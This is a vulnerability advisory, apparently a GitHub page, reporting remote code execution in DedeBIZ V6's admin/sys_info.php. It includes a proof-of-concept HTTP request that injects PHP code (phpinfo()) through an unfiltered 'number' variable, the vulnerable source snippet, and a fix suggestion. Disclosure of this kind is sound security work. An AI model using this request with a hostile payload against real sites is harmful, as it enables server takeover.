Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Dedebiz has remote code execution

  • Affected product: DedeBIZ V6
  • Attack type: Remote
  • Affected component: /admin/sys_info.php
  • Description: DedeBIZ v6.* was discovered to contain a remote code execution vulnerability in sys_info.php.
  • Vendor confirmed or acknowledged: Confirmed
  • Fix Information: Not available

POC

GET /admin/sys_info.php?dopost=add&nvarname=test&nvarvalue=phpinfo()&vartype=number HTTP/1.1
Host: www.dedebiz6.com
Cookie:  PHPSESSID=bs4vp003uqilf3pj1al024egs2; DedeUserID=1; DedeUserID__ckMd5=6d2e834b19e2030a; DedeLoginTime=1657701678; DedeLoginTime__ckMd5=34d8cf865664d363
Connection: close

Details

DedeBIZ v6.* backend admin/sys_info.php has the function of adding variables, but the filtering of variables of type 'number' is not strict when writing to the database and php files, resulting in remote code execution.

2022-07-13_174059.png

2022-07-13_175255.png

while ($row = $dsql->GetArray()) {
    if ($row['type'] == 'number') {
        if ($row['value'] == '') $row['value'] = 0;
        fwrite($fp, "\${$row['varname']} = ".$row['value'].";\r\n");
    } else {
        ...
    }
}
                

Suggestions for fixing

For variables with vartype as 'number', check if it is a number or force it to be a number before writing to database and php files.